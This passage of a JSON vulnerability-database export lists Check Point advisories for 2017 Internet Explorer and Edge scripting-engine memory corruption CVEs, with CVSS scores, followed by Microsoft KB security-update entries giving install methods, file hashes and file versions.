Successful exploitation of this vulnerability can result in Remote Code Execution.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Browser Scripting Engine Memory Corruption (CVE-2017-11930)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11930"], "modified": "2017-12-12T00:00:00", "id": "CPAI-2017-1040", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:32:34", "description": "A remote code execution vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error in the way Internet Explorer accesses an object in memory. 
A remote attacker can exploit this issue by enticing a target victim to open a specially crafted web page.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Scripting Engine Memory Corruption (CVE-2017-11890)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11890"], "modified": "2017-12-12T00:00:00", "id": "CPAI-2017-1036", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:32:36", "description": "A remote code execution vulnerability exists in Microsoft Internet Explorer. The vulnerability is in the way that Microsoft Internet Explorer JavaScript engines render content when handling objects in memory. 
The vulnerability can corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Scripting Engine Memory Corruption (CVE-2017-11901)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11901"], "modified": "2017-12-12T00:00:00", "id": "CPAI-2017-1043", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:32:36", "description": "A remote code execution vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer accesses an object in memory that has been deleted. 
A remote attacker can exploit this vulnerability by enticing a target victim to open a specially crafted web page.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Scripting Engine Memory Corruption (CVE-2017-11903)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11903"], "modified": "2017-12-12T00:00:00", "id": "CPAI-2017-1029", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:32:40", "description": "A remote code execution vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer accesses an object in memory. 
A remote attacker can exploit this vulnerability by enticing a target victim to open a specially crafted web page.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Scripting Engine Memory Corruption (CVE-2017-11907)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11907"], "modified": "2017-12-12T00:00:00", "id": "CPAI-2017-1031", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:41:44", "description": "A remote code execution vulnerability exists in Microsoft Edge. The vulnerability is in the way that Microsoft browser javascript engines render content when handling objects in memory. 
The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Edge Memory Corruption (CVE-2017-11888; CVE-2018-8125)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11888", "CVE-2018-8125"], "modified": "2018-07-10T00:00:00", "id": "CPAI-2017-1032", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:38:36", "description": "A remote code execution vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to a type confusion when handling scripts. 
A remote attacker can exploit this issue by enticing a target victim to open a specially crafted web page that could cause memory corruption in a way that would allow attackers to execute code on the target system.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-09-13T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Memory Corruption (MS16-104: CVE-2016-3375; CVE-2017-11913)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3375", "CVE-2017-11913"], "modified": "2017-12-12T00:00:00", "id": "CPAI-2016-0750", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:47:44", "description": "<html><body><p>Resolves an information disclosure vulnerability in Windows Server 2008.</p><h2>Summary</h2><div class=\"kb-summary-section section\">An information disclosure vulnerability exists when the Windows <em>its://</em> protocol handler unnecessarily sends traffic to a remote site to determine the zone of a provided URL. 
This could potentially result in the disclosure of sensitive information to a malicious site.<br/><br/>To learn more about the vulnerability, go to <a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-11927\" id=\"kb-link-2\" target=\"_self\"> CVE-2017-11927</a>.</div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important</span><br/>\u00a0<ul class=\"sbody-free_list\"><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>.</li></ul></div><h2>How to obtain and install the update</h2><div class=\"kb-resolution-section section\"> <h3 class=\"sbody-h3\">Method 1: Windows Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see <a href=\"https://www.microsoft.com/en-us/safety/pc-security/updates.aspx\" id=\"kb-link-13\" target=\"_self\">Windows Update: FAQ</a>. </div><h3 class=\"sbody-h3\">Method 2: Microsoft Update Catalog</h3><div class=\"kb-collapsible kb-collapsible-expanded\">To get the stand-alone package for this update, go to the <a href=\"http://catalog.update.microsoft.com/v7/site/search.aspx?q=4053473\" id=\"kb-link-14\" target=\"_self\">Microsoft Update Catalog</a> website. 
<br/></div></div><h2>Deployment information</h2><p>For deployment details for this security update, see the following article in the Microsoft Knowledge Base:</p><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/20171212\" id=\"kb-link-9\">Security update deployment information: December 12, 2017</a></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></td></tr><tr><td faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-15\" target=\"_self\">Windows Update: FAQ</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-16\" target=\"_self\">TechNet Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Secure</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></div><br/></span></td></tr></tbody></table><a class=\"bookmark\" id=\"fileinfo\"></a></div><h2>File Information</h2><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">File hash information</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File name</th><th>SHA1 hash</th><th>SHA256 
hash</th></tr><tr><td>Windows6.0-KB4053473-x86.msu</td><td>38BCE995E8AC36FD9DBC74C2ACDF0039FBA032A5</td><td>FE57E559C28FFD0C3B9566A10B12C77B8AEC2D9569B6F77EE5ABD3FCC833C2D2</td></tr><tr><td>Windows6.0-KB4053473-ia64.msu</td><td>A64AFC344797A4138707CE211C361A2C0CFE724D</td><td>03C6F1BD5C569C9019E233BCF65392CD5F135BD34A2AE7D5F4467EB8CC85A4F6</td></tr><tr><td>Windows6.0-KB4053473-x64.msu</td><td>3C9024AEC6CCF45025FB4E10D9D776E2933A66C9</td><td>9CF1E8631D67134FF69A47DB2EC478571CA8B9B9BCB1281A581145FDCCE76CD6</td></tr></tbody></table></td></tr></tbody></table><p><br/><strong>File information</strong><br/><br/><span>The English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and\u00a0times may change when you perform certain operations on the files.</span><br/><br/><strong>Windows Server 2008 file information</strong></p><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"alert-title\">Notes</div><div class=\"row\"><div class=\"col-xs-24\"><p>The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.</p></div></div></div></div><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">For all supported x86-based versions</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong 
class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Itircl.dll</td><td>6.0.6002.24233</td><td>158,208</td><td>07-Nov-2017</td><td>16:33</td><td>x86</td></tr><tr><td>Itss.dll</td><td>6.0.6002.24233</td><td>141,824</td><td>07-Nov-2017</td><td>16:33</td><td>x86</td></tr></tbody></table></td></tr></tbody></table><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">For all supported ia64-based versions</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Itircl.dll</td><td>6.0.6002.24233</td><td>601,600</td><td>07-Nov-2017</td><td>16:28</td><td>IA-64</td></tr><tr><td>Itss.dll</td><td>6.0.6002.24233</td><td>393,728</td><td>07-Nov-2017</td><td>16:28</td><td>IA-64</td></tr><tr><td>Itircl.dll</td><td>6.0.6002.24233</td><td>158,208</td><td>07-Nov-2017</td><td>16:33</td><td>x86</td></tr><tr><td>Itss.dll</td><td>6.0.6002.24233</td><td>141,824</td><td>07-Nov-2017</td><td>16:33</td><td>x86</td></tr></tbody></table></td></tr></tbody></table><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">For all supported x64-based versions</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong 
class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Itircl.dll</td><td>6.0.6002.24233</td><td>192,000</td><td>07-Nov-2017</td><td>18:14</td><td>x64</td></tr><tr><td>Itss.dll</td><td>6.0.6002.24233</td><td>169,472</td><td>07-Nov-2017</td><td>18:14</td><td>x64</td></tr><tr><td>Itircl.dll</td><td>6.0.6002.24233</td><td>158,208</td><td>07-Nov-2017</td><td>16:33</td><td>x86</td></tr><tr><td>Itss.dll</td><td>6.0.6002.24233</td><td>141,824</td><td>07-Nov-2017</td><td>16:33</td><td>x86</td></tr></tbody></table></td></tr></tbody></table></body></html>", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-12-12T00:00:00", "type": "mskb", "title": "Description of the security update for the information disclosure vulnerability in Windows Server 2008: December 12, 2017\n", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11927"], "modified": "2017-12-12T18:14:05", "id": "KB4053473", "href": "https://support.microsoft.com/en-us/help/4053473/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T10:39:42", "description": "None\n## Summary\n\nAn information disclosure 
vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site to determine the zone of a provided URL. This could potentially result in the disclosure of sensitive information to a malicious site. \n \nTo learn more about the vulnerability, go to [CVE-2017-11927](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2017-11927>).\n\n## More Information\n\n**Important** If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Windows Update: FAQ](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>). \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=4130957>) website. \n\n\n## Deployment information\n\nFor deployment details for this security update, see the following article in the Microsoft Knowledge Base: [Security update deployment information: May 08, 2018](<http://support.microsoft.com/en-us/help/20180508>)\n\n## More Information\n\n \n**File information** \n \nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). 
The dates and times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files. \n \n**Windows Server 2008 file information**\n\n**Note:** The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n## How to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update: FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\n## Windows Server 2008 file information\n\n## File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB4130957-ia64.msu| F95AA5018FFCDCEC540797840F162B6E18FB1999| B3870E9CDE256E1D1847625F8FF7BC617C8E453B2ADE7C09447428BE3F23AC03 \nWindows6.0-KB4130957-x86.msu| 1F65BE1B43ED61D43289E87BBEE91CA6E52A6970| 2A3CCB97059EAECC4EF20BA9A09AD7E3A108AF1AC04D77AD8ABC2586F13C2133 \nWindows6.0-KB4130957-x64.msu| FB05FBE543F0874E745A00B4C2EE5BA3FF1BD248| EFEB04D9E317221F07CAEC7ED6D2D7C76E1AEA4060890A4037EE7B2EA2E29995 \n \n## For all supported ia64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nItircl.dll| 6.0.6002.24379| 601,600| 12-Apr-2018| 14:30| IA-64 \nItss.dll| 6.0.6002.24379| 394,240| 12-Apr-2018| 14:30| IA-64 \nItircl.dll| 6.0.6002.24379| 158,720| 12-Apr-2018| 14:48| x86 \nItss.dll| 6.0.6002.24379| 142,336| 12-Apr-2018| 14:48| x86 \n \n## For all supported x86-based versions\n\n**File name**| **File 
version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nItircl.dll| 6.0.6002.24379| 158,720| 12-Apr-2018| 14:48| x86 \nItss.dll| 6.0.6002.24379| 142,336| 12-Apr-2018| 14:48| x86 \n \n## For all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nItircl.dll| 6.0.6002.24379| 192,000| 12-Apr-2018| 14:38| x64 \nItss.dll| 6.0.6002.24379| 169,472| 12-Apr-2018| 14:38| x64 \nItircl.dll| 6.0.6002.24379| 158,720| 12-Apr-2018| 14:48| x86 \nItss.dll| 6.0.6002.24379| 142,336| 12-Apr-2018| 14:48| x86 \n \n## Windows Embedded POSReady 2009 and Windows Embedded Standard 2009 file information\n\n## File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindowsXP-KB4130957-x86-Embedded-ENU.exe| DAB532721CE76725B35909E6D95C9D430EDC1E13| 202E7266247BB2646F2A76D80CB1808A6389CFEF2EB8FE00599EC1CA26A516F4 \n**Windows Embedded POSReady 2009 and Windows Embedded Standard 2009 file information**\n\n## For all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nItss.dll| 5.2.3790.6349| 138,240| 30-Apr-2018| 19:10| x86 \nUpdspapi.dll| 6.3.13.0| 382,840| 01-Feb-2018| 21:28| x86\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "Description of the security update for the Windows information disclosure vulnerability in Windows Server 2008, Windows Embedded POSReady 2009, and Windows Embedded Standard 2009: May 08, 2018", "bulletinFamily": 
"microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11927"], "modified": "2017-12-12T08:00:00", "id": "KB4130957", "href": "https://support.microsoft.com/en-us/help/4130957", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-24T11:11:36", "description": "None\n## Improvements and fixes\n\nThis security update includes quality improvements. No new operating system features are being introduced in this update. Key changes include:\n\n * Addresses additional issues with updated time zone information.\n * Security updates to the Microsoft Scripting Engine and Windows Server.\nFor more information about the resolved security vulnerabilities, see the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\nThis update is now available for installation through WSUS. 
To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4054521>) website.\n\n**File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 4054521](<http://download.microsoft.com/download/B/F/A/BFAC2CC0-4004-42A5-B859-B2B89B81773A/4054521.csv>).\n", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": "December 12, 2017\u2014KB4054521 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885"], "modified": "2017-12-12T08:00:00", "id": "KB4054521", "href": "https://support.microsoft.com/en-us/help/4054521", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-24T11:11:37", "description": "None\n## Improvements and fixes\n\nThis security update includes quality improvements. No new operating system features are being introduced in this update. 
Key changes include:\n\n * Addresses additional issues with updated time zone information.\n * Security updates to the Microsoft Scripting Engine and Windows Server.\nFor more information about the resolved security vulnerabilities, see the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\nThis update is now available for installation through WSUS. To get the standalone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4054523>) website.\n\n**File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 4054523](<http://download.microsoft.com/download/D/9/D/D9D85C67-73B5-4DEA-A0A2-3C6CAD39EFB7/4054523.csv>).\n", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T08:00:00", "type": "mskb", "title": 